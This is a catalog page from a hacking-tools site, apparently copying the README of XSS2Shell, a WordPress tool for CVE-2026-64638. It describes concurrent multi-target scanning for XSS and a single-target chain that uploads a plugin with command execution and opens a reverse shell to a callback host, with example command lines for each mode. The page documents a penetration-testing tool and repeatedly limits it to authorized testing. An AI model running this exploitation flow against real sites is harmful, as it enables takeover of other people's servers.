Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
XSS2Shell-CVE-2026-64638 — Сканер безопасности WordPress, который определяет версии, обнаруживает отражённый XSS на нескольких целях одновременно и поддерживает аутентифицированный процесс эксплуатации XSS-to-RCE для санкционированного тестирования. | Kitploit
Инструменты/GitHubGitHub/mr-leonardogomes/xss2shell-cve-2026-64638
РазведкаСканеры веб-уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubmr-leonardogomes/xss2shell-cve-2026-64638

XSS2Shell-CVE-2026-64638

Сканер безопасности WordPress, который определяет версии, обнаруживает отражённый XSS на нескольких целях одновременно и поддерживает аутентифицированный процесс эксплуатации XSS-to-RCE для санкционированного тестирования.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
161 месяц назадЕщё не проверено

🔍 @Mr-LeonardoGomes

💀 XSS2Shell-CVE-2026-64638

Versão 2026 Status Ativo PRs Bem-vindos Licença MIT
Feito com amor Bug Bounty 2026 Pentest Metodologia

Методология охоты на баги 2026

XSS2Shell — мульти-целевой сканер

Разработчик: Автор: YogaGymn

Утилита PoC/сканирования для авторизованных тестов безопасности WordPress. Проект содержит поток эксплойта для одиночной цели и конкурентный режим только сканирование для множества целей.

Важно: Используйте этот проект только на установках WordPress, которыми вы владеете или для которых у вас есть явное разрешение на тестирование. Мульти-целевой сканер намеренно ограничен определением версии и обнаружением отражения XSS; он не выполняет захват учётных данных, загрузку плагина или RCE против списка целей.

Возможности

Режим одиночной цели

Оригинальный скрипт поддерживает:

  • Определение версии WordPress.
  • Обнаружение отражения XSS.
  • Режимы auto, xss и direct.
  • Поток прямой аутентификации в WordPress и загрузки плагина.
  • Функциональность XSS-цепочки, присутствующая в оригинальном PoC.
  • Опциональная функциональность callback/reverse-shell, присутствующая в оригинальном PoC.

Мульти-целевой режим

Добавленный сканер поддерживает:

  • Чтение целей из текстового файла.
  • Удаление дублирующихся целей.
  • Конкурентное сканирование с помощью ThreadPoolExecutor.
  • Настраиваемое количество workers.
  • Определение версии WordPress.
  • Обнаружение отражения XSS.
  • Отчёт о ходе выполнения.
  • Результаты сохраняются в том же порядке, что и во входном файле.
  • Сводная статистика.

Мульти-целевой режим не вызывает оригинальные функции RCE.

Требования

  • Python 3.9+
  • requests

Установите зависимость:

root@kitploit:~
python3 -m pip install requests

Если ваш дистрибутив Linux использует внешне управляемое окружение Python, воспользуйтесь виртуальным окружением:

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
pip install requests

Установка

Клонируйте или скопируйте проект: оригинал эксплойта yogaGymn

root@kitploit:~
git clone https://github.com/yogaGymn/XSS2Shell-CVE-2026-64638
cd XSS2Shell-CVE-2026-64638

Или просто поместите:

root@kitploit:~
xss2shell.py

в ваш рабочий каталог.

Сканер множества целей

Создайте файл с именем targets.txt OU alvos.txt:

root@kitploit:~
https://example1.test
https://example2.test
https://example3.test

Комментарии и пустые строки игнорируются:

root@kitploit:~
# Alvos de laboratório autorizado
https://example1.test

https://example2.test

Запустите сканер:

root@kitploit:~
python3 xss2shell.py -i targets.txt

По умолчанию используется 10 workers.

Изменение степени конкурентности

Например, используйте 20 workers:

root@kitploit:~
python3 xss2shell.py -i targets.txt --workers 20

Для небольшой лаборатории:

root@kitploit:~
python3 xss2shell.py -i targets.txt --workers 5

Не выбирайте без необходимости высокое число workers, так как это может увеличить нагрузку на соединения и вызвать ограничения частоты запросов или срабатывание защитных механизмов.

Изменение файла вывода

root@kitploit:~
python3 xss2shell.py \
  -i targets.txt \
  --workers 10 \
  --output results.txt

Пример вывода

root@kitploit:~
[*] Multiple-target scan: 3 target(s)
[*] Concurrent workers: 10
[*] Scan-only: WordPress fingerprint + XSS reflection check
[*] No login, plugin upload, credential capture, or RCE

[1/3] https://example1.test | WP=6.8.2 | XSS=XSS_NOT_DETECTED (ESCAPED)
[2/3] https://example2.test | WP=6.7.1 | XSS=XSS_REFLECTION_DETECTED (AREA_BYPASS)
[3/3] https://example3.test | WP=unknown | XSS=XSS_NOT_DETECTED (NOT_REFLECTED)

=======================================================
MULTIPLE-TARGET SCAN COMPLETE
=======================================================
Total targets : 3
XSS detected  : 1
Not detected  : 2
Errors        : 0
Results saved : scan_results.txt

Формат результата

По умолчанию scan_results.txt использует поля, разделённые табуляцией:

root@kitploit:~
TARGET  WORDPRESS_VERSION  XSS_STATUS  XSS_DETAIL

Пример:

root@kitploit:~
https://example1.test    6.8.2    XSS_NOT_DETECTED          ESCAPED
https://example2.test    6.7.1    XSS_REFLECTION_DETECTED   AREA_BYPASS

Значения статуса XSS


Статус Значение


XSS_REFLECTION_DETECTED Сканер обнаружил проверяемое поведение отражения HTML. Это само по себе не является доказательством RCE.

XSS_NOT_DETECTED Проверяемое отражение не было обнаружено.

ERROR При проверке возникло исключение.

Значения деталей XSS

Сканер может сообщать такие детали, как:

  • RAW_HTML
  • AREA_BYPASS
  • ESCAPED
  • STRIPPED
  • NOT_REFLECTED

Эти значения описывают ответ, наблюдаемый процедурой обнаружения; их следует проверять вручную, прежде чем считать результат подтверждённой уязвимостью.

Использование с одиночной целью

Оригинальный скрипт также поддерживает аргументы для одиночной цели.

Автоматический режим

root@kitploit:~
python3 xss2shell.py \
  -u admin \
  -p 'PASSWORD' \
  http://authorized-target.test

Прямой режим

root@kitploit:~
python3 xss2shell.py \
  --mode direct \
  -u admin \
  -p 'PASSWORD' \
  http://authorized-target.test

Режим XSS

root@kitploit:~
python3 xss2shell.py \
  --mode xss \
  --lhost 192.0.2.10 \
  http://authorized-lab.test

Потоки XSS/прямого режима могут создавать или активировать плагин, содержащий функциональность выполнения команд. Используйте их только в авторизованной тестовой среде.

Справочник по CLI

root@kitploit:~
usage: xss2shell.py [-h]
       [-i TARGET_FILE] [--output OUTPUT] [--workers WORKERS]
       [--mode {auto,xss,direct}]
       [-u USERNAME] [-p PASSWORD]
       [--lhost LHOST] [--lport LPORT]
       [--slug SLUG] [--callback-port CALLBACK_PORT]
       [--no-rev]
       [target]

Аргументы


Аргумент Описание


target URL одиночной цели.

-i, --input Файл, содержащий несколько целей.

--output Выходной файл для результатов мульти-целевого сканирования. По умолчанию: scan_results.txt.

--workers Количество конкурентных workers. По умолчанию: 10.

--mode Оригинальный режим одиночной цели: auto, xss или direct.

-u, --username Имя пользователя WordPress для оригинального прямого/запасного рабочего процесса.

-p, --password Пароль WordPress для оригинального прямого/запасного рабочего процесса.

--lhost Хост обратного вызова/reverse-shell для оригинального PoC.

--lport Порт reverse-shell. По умолчанию: 4444.

--slug Слаг плагина. По умолчанию: xss2shell.

--callback-port Порт сервера обратного вызова. По умолчанию: 9090.

--no-rev Пропустить запуск reverse-shell в оригинальном рабочем процессе.

Как работает одновременное сканирование

Мульти-целевой режим использует следующую возможность Python:

root@kitploit:~
ThreadPoolExecutor

Каждая цель отправляется как независимая задача сканирования:

root@kitploit:~
targets.txt
     |
     v
+----+----+----+----+
| T1 | T2 | T3 | T4 | ... 
+----+----+----+----+
  |    |    |    |
  v    v    v    v
 WP   WP   WP   WP
 XSS  XSS  XSS  XSS
  |    |    |    |
  +----+----+----+
        |
        v
   scan_results.txt

Результаты собираются по мере завершения задач, а итоговый вывод формируется в соответствии с исходным порядком целей.

Область применения и безопасность

Мульти-целевой режим предназначен для авторизованных оценок безопасности и лабораторных сред.

Рекомендуемый рабочий процесс:

  1. Получите письменное разрешение.
  2. Включайте в файл targets.txt только авторизованные домены/IP-адреса.
  3. Начните с уменьшенного количества workers (процессов выполнения).
  4. Проанализируйте вывод сканера.
  5. Вручную проверьте значимые находки.
  6. Задокументируйте доказательства и меры по устранению.

Не используйте сканер против систем третьих лиц без разрешения.

Ограничения

Сканер не является полноценным инструментом оценки уязвимостей.

В частности:

  • Обнаруженное отражение HTML автоматически не доказывает существование эксплуатируемой уязвимости XSS.
  • Версия WordPress, полученная из публичных endpoints, может отсутствовать или быть неверной.
  • Статус unknown (неизвестно) не означает, что цель уязвима.
  • Сетевые ошибки могут приводить к неполным результатам.
  • Поведение WAF/CDN может влиять на обнаружение.
  • Сканер не определяет эксплуатируемость или возможность RCE в мульти-целевом режиме.
  • Результаты должны проверяться вручную перед сообщением об уязвимости.

Структура проекта

root@kitploit:~
.
├── xss2shell.py
├── targets.txt
└── scan_results.txt

Лицензия

В предоставленном исходном коде не было информации о лицензии.

Если этот проект будет опубликован публично, добавьте явный файл лицензии, например LICENSE. Этот код является дальнейшим развитием оригинального кода ZSecurity.

Скачать инструмент